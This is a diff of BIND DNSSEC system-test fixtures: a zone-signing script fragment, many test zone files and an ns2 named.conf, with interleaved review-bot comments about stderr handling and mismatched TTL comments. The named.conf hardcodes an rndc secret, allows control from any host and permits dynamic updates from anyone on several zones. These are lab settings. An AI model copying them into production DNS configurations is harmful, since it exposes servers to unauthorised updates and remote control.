+zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+
+cat "$infile" "$ksk.key" "$zsk.key" > "$zonefile"
+
+"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1
+
+# Configure the resolving server with a staitc key.
+keyfile_to_static_ds "$ksk" > trusted.conf
+cp trusted.conf ../ns2/trusted.conf
+cp trusted.conf ../ns3/trusted.conf
+cp trusted.conf ../ns4/trusted.conf
+cp trusted.conf ../ns6/trusted.conf
+cp trusted.conf ../ns7/trusted.conf
+cp trusted.conf ../ns9/trusted.conf
+
+keyfile_to_trusted_keys "$ksk" > trusted.keys
+
+# ...or with an initializing key.
+keyfile_to_initial_ds "$ksk" > managed.conf
+cp managed.conf ../ns4/managed.conf
+
+#
+# Save keyid for managed key id test.
+#
+
+keyfile_to_key_id "$ksk" > managed.key.id
diff --git a/bin/tests/system/dnssec/ns2/algroll.db.in b/bin/tests/system/dnssec/ns2/algroll.db.in
new file mode 100644
index 0000000..6f66fc9
--- /dev/null
+++ b/bin/tests/system/dnssec/ns2/algroll.db.in
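Review bot: The signing step in ns1/sign.sh, `"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1`, throws away stderr, so when signing the root zone fails `set -e` stops the script with no diagnostic, and the trust anchors for the other servers are never written. Keep stdout quiet but let errors through with `"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null`; if the signer turns out to be noisy on stderr even on success, redirect both streams to a log file and print it on failure. The comment `# Configure the resolving server with a staitc key.` should read `static`. The `-e` on the `#!/bin/sh -e` line is redundant with `set -e`, and only `set -e` takes effect when the script is started as `$SHELL sign.sh`, the way this script starts its ns2/ns6/ns7 siblings.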
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 30 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
diff --git a/bin/tests/system/dnssec/ns2/badparam.db.in b/bin/tests/system/dnssec/ns2/badparam.db.in
new file mode 100644
index 0000000..b18d186
--- /dev/null
+++ b/bin/tests/system/dnssec/ns2/badparam.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2010081000 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
diff --git a/bin/tests/system/dnssec/ns2/cdnskey-auto.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey-auto.secure.db.in
new file mode 100644
index 0000000..aa3aaab
--- /dev/null
+++ b/bin/tests/system/dnssec/ns2/cdnskey-auto.secure.db.in
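Review bot: Two comments in ns2/algroll.db.in contradict the values they annotate: `$TTL 30 ; 5 minutes` sets a 30-second TTL, and `30 ; minimum (1 hour)` sets a 30-second SOA minimum. It looks as if the values were shortened for the test and the comments were carried over from the 300/3600 template used by the neighbouring zone files, but that is an inference; if so the lines should read `$TTL 30 ; 30 seconds` and `30 ; minimum (30 seconds)`. ns2/corp.db later in this diff has the same two lines and needs the same correction.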
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cdnskey-kskonly.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey-kskonly.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey-kskonly.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cdnskey-update.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey-update.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey-update.secure.db.in 
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cdnskey.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds-auto.secure.db.in b/bin/tests/system/dnssec/ns2/cds-auto.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds-auto.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. 
diff --git a/bin/tests/system/dnssec/ns2/cds-kskonly.secure.db.in b/bin/tests/system/dnssec/ns2/cds-kskonly.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds-kskonly.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds-update.secure.db.in b/bin/tests/system/dnssec/ns2/cds-update.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds-update.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds.secure.db.in b/bin/tests/system/dnssec/ns2/cds.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds.secure.db.in 
@@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/child.nsec3.example.db b/bin/tests/system/dnssec/ns2/child.nsec3.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/child.nsec3.example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/child.optout.example.db b/bin/tests/system/dnssec/ns2/child.optout.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/child.optout.example.db 
@@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/corp.db b/bin/tests/system/dnssec/ns2/corp.db new file mode 100644 index 0000000..b2912bc --- /dev/null +++ b/bin/tests/system/dnssec/ns2/corp.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 30 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +www A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns2/dst.example.db.in b/bin/tests/system/dnssec/ns2/dst.example.db.in new file mode 100644 index 0000000..0039484 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/dst.example.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2.example. +a A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns2/example.db.in b/bin/tests/system/dnssec/ns2/example.db.in new file mode 100644 index 0000000..f711f58 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/example.db.in 
@@ -0,0 +1,171 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +bad-cname CNAME a +bad-dname DNAME @ + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns3.secure +ns3.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A second insecure subdomain +insecure2 NS ns.insecure2 +ns.insecure2 A 10.53.0.3 + +; A secure subdomain we're going to inject bogus data into +bogus NS ns.bogus +ns.bogus A 10.53.0.3 + +; A subdomain with a corrupt DS +badds NS ns.badds +ns.badds A 10.53.0.3 + +; A dynamic secure subdomain +dynamic NS dynamic +dynamic A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +; A subdomain with expired signatures +expired NS ns.expired +ns.expired A 10.53.0.3 + +; A rfc2535 signed zone w/ CNAME +rfc2535 NS ns.rfc2535 +ns.rfc2535 A 10.53.0.3 + +z A 10.0.0.26 + +keyless NS ns.keyless +ns.keyless A 10.53.0.3 + +nsec3 NS ns.nsec3 
+ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +dnskey-unknown NS ns.dnskey-unknown +ns.dnskey-unknown A 10.53.0.3 + +dnskey-unsupported NS ns.dnskey-unsupported +ns.dnskey-unsupported A 10.53.0.3 + +dnskey-nsec3-unknown NS ns.dnskey-nsec3-unknown +ns.dnskey-nsec3-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +*.wild A 10.0.0.27 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +kskonly NS ns.kskonly +ns.kskonly A 10.53.0.3 + +update-nsec3 NS ns.update-nsec3 +ns.update-nsec3 A 10.53.0.3 + +auto-nsec NS ns.auto-nsec +ns.auto-nsec A 10.53.0.3 + +auto-nsec3 NS ns.auto-nsec3 +ns.auto-nsec3 A 10.53.0.3 + + +below-cname CNAME some.where.else. + +insecure.below-cname NS ns.insecure.below-cname +ns.insecure.below-cname A 10.53.0.3 + +secure.below-cname NS ns.secure.below-cname +ns.secure.below-cname A 10.53.0.3 + +ttlpatch NS ns.ttlpatch +ns.ttlpatch A 10.53.0.3 + +split-dnssec NS ns.split-dnssec +ns.split-dnssec A 10.53.0.3 + +split-smart NS ns.split-smart +ns.split-smart A 10.53.0.3 + +upper NS ns.upper +ns.upper A 10.53.0.3 + +LOWER NS NS.LOWER +NS.LOWER A 10.53.0.3 + +expiring NS ns.expiring +ns.expiring A 10.53.0.3 + +future NS ns.future +ns.future A 10.53.0.3 + +managed-future NS ns.managed-future +ns.managed-future A 10.53.0.3 + +revkey NS ns.revkey +ns.revkey A 10.53.0.3 + +dname-at-apex-nsec3 NS ns3 diff --git a/bin/tests/system/dnssec/ns2/hours-vs-days.db.in b/bin/tests/system/dnssec/ns2/hours-vs-days.db.in new file mode 100644 index 0000000..5ec8801 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/hours-vs-days.db.in 
@@ -0,0 +1,167 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +bad-cname CNAME a +bad-dname DNAME @ + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns3.secure +ns3.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A secure subdomain we're going to inject bogus data into +bogus NS ns.bogus +ns.bogus A 10.53.0.3 + +; A subdomain with a corrupt DS +badds NS ns.badds +ns.badds A 10.53.0.3 + +; A dynamic secure subdomain +dynamic NS dynamic +dynamic A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +; A subdomain with expired signatures +expired NS ns.expired +ns.expired A 10.53.0.3 + +; A rfc2535 signed zone w/ CNAME +rfc2535 NS ns.rfc2535 +ns.rfc2535 A 10.53.0.3 + +z A 10.0.0.26 + +keyless NS ns.keyless +ns.keyless A 10.53.0.3 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS 
ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +dnskey-unknown NS ns.dnskey-unknown +ns.dnskey-unknown A 10.53.0.3 + +dnskey-unsupported NS ns.dnskey-unsupported +ns.dnskey-unsupported A 10.53.0.3 + +dnskey-nsec3-unknown NS ns.dnskey-nsec3-unknown +ns.dnskey-nsec3-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +*.wild A 10.0.0.27 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +kskonly NS ns.kskonly +ns.kskonly A 10.53.0.3 + +update-nsec3 NS ns.update-nsec3 +ns.update-nsec3 A 10.53.0.3 + +auto-nsec NS ns.auto-nsec +ns.auto-nsec A 10.53.0.3 + +auto-nsec3 NS ns.auto-nsec3 +ns.auto-nsec3 A 10.53.0.3 + + +below-cname CNAME some.where.else. + +insecure.below-cname NS ns.insecure.below-cname +ns.insecure.below-cname A 10.53.0.3 + +secure.below-cname NS ns.secure.below-cname +ns.secure.below-cname A 10.53.0.3 + +ttlpatch NS ns.ttlpatch +ns.ttlpatch A 10.53.0.3 + +split-dnssec NS ns.split-dnssec +ns.split-dnssec A 10.53.0.3 + +split-smart NS ns.split-smart +ns.split-smart A 10.53.0.3 + +upper NS ns.upper +ns.upper A 10.53.0.3 + +LOWER NS NS.LOWER +NS.LOWER A 10.53.0.3 + +expiring NS ns.expiring +ns.expiring A 10.53.0.3 + +future NS ns.future +ns.future A 10.53.0.3 + +managed-future NS ns.managed-future +ns.managed-future A 10.53.0.3 + +revkey NS ns.revkey +ns.revkey A 10.53.0.3 + +dname-at-apex-nsec3 NS ns3 diff --git a/bin/tests/system/dnssec/ns2/in-addr.arpa.db.in b/bin/tests/system/dnssec/ns2/in-addr.arpa.db.in new file mode 100644 index 0000000..874b915 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/in-addr.arpa.db.in 
@@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. +; +; As we are testing empty zone behaviour ns3 doesn't need to be +; configured to serve 10.in-addr.arpa. +; +10 NS ns3.example. diff --git a/bin/tests/system/dnssec/ns2/insecure.secure.example.db b/bin/tests/system/dnssec/ns2/insecure.secure.example.db new file mode 100644 index 0000000..62862f5 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/insecure.secure.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns2/key.db.in b/bin/tests/system/dnssec/ns2/key.db.in new file mode 100644 index 0000000..2ff5df4 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/key.db.in 
@@ -0,0 +1,45 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; A secure subdomain +secure NS ns3.secure +ns3.secure A 10.53.0.3 + +; A subdomain that is signed with an unsupported algorithm +unsupported NS ns3.unsupported +ns3.unsupported A 10.53.0.3 + +; A secure subdomain with a disabled algorithm +disabled NS ns3.disabled +ns3.disabled A 10.53.0.3 + +; A secure subdomain with a disabled algorithm, but not in bailiwick +enabled NS ns3.enabled +ns3.enabled A 10.53.0.3 + +; A secure subdomain with a revoked trust anchor +revoked NS ns3.revoked +ns3.revoked A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns2/named.conf.in b/bin/tests/system/dnssec/ns2/named.conf.in new file mode 100644 index 0000000..fbfd070 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/named.conf.in 
@@ -0,0 +1,201 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+ notify-delay 1;
+ minimal-responses no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "trusted" {
+ type primary;
+ file "trusted.db.signed";
+};
+
+zone "managed" {
+ type primary;
+ file "managed.db.signed";
+};
+
+zone "example" {
+ type primary;
+ file "example.db.signed";
+ allow-update { any; };
+};
+
+zone "insecure.secure.example" {
+ type primary;
+ file "insecure.secure.example.db";
+ allow-update { any; };
+};
+
+zone "rfc2335.example" {
+ type primary;
+ file "rfc2335.example.db";
+};
+
+zone "child.nsec3.example" {
+ type primary;
+ file "child.nsec3.example.db";
+ allow-update { none; };
+};
+
+zone "child.optout.example" {
+ type primary;
+ file "child.optout.example.db";
+ allow-update { none; };
+};
+
+zone "badparam" {
+ type primary;
+ file "badparam.db.bad";
+};
+
+zone "single-nsec3" {
+ type primary;
+ file "single-nsec3.db.signed";
+};
+
+zone "algroll" {
+ type primary;
+ file "algroll.db.signed";
+};
+
+zone "nsec3chain-test" {
+ type primary;
+ file "nsec3chain-test.db.signed";
+ allow-update {any;};
+};
+
+zone "in-addr.arpa" {
+ type primary;
+ file "in-addr.arpa.db.signed";
+};
+
+zone "cds.secure" {
+ type primary;
+ file "cds.secure.db.signed";
+};
+
+zone "cds-x.secure" {
+ type primary;
+ file "cds-x.secure.db.signed";
+};
+
+zone "cds-update.secure" {
+ type primary;
+ file "cds-update.secure.db.signed";
+ allow-update { any; };
+};
+
+zone "cds-kskonly.secure" {
+ type primary;
+ dnssec-dnskey-kskonly yes;
+ file "cds-kskonly.secure.db.signed";
+ allow-update { any; };
+};
+
+zone "cds-auto.secure" {
+ type primary;
+ file "cds-auto.secure.db.signed";
+ auto-dnssec maintain;
+ allow-update { any; };
+};
+
+zone "cdnskey.secure" {
+ type primary;
+ file "cdnskey.secure.db.signed";
+};
+
+zone "cdnskey-x.secure" {
+ type primary;
+ file "cdnskey-x.secure.db.signed";
+};
+
+zone "cdnskey-update.secure" {
+ type primary;
+ file "cdnskey-update.secure.db.signed";
+ allow-update { any; };
+};
+
+zone "cdnskey-kskonly.secure" {
+ type primary;
+ dnssec-dnskey-kskonly yes;
+ file "cdnskey-kskonly.secure.db.signed";
+ allow-update { any; };
+};
+
+zone "cdnskey-auto.secure" {
+ type primary;
+ file "cdnskey-auto.secure.db.signed";
+ auto-dnssec maintain;
+ allow-update { any; };
+};
+
+zone "updatecheck-kskonly.secure" {
+ type primary;
+ auto-dnssec maintain;
+ key-directory ".";
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+ sig-validity-interval 10;
+ dnskey-sig-validity 40;
+ file "updatecheck-kskonly.secure.db.signed";
+ allow-update { any; };
+};
+
+zone "corp" {
+ type primary;
+ file "corp.db";
+};
+
+zone "hours-vs-days" {
+ type master;
+ file "hours-vs-days.db.signed";
+ auto-dnssec maintain;
+ /* validity 500 days, resign in 499 days */
+ sig-validity-interval 500 499;
+ allow-update { any; };
+};
+
+zone "too-many-iterations" {
+ type master;
+ file "too-many-iterations.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/dnssec/ns2/private.secure.example.db.in b/bin/tests/system/dnssec/ns2/private.secure.example.db.in
new file mode 100644
index 0000000..94042ae
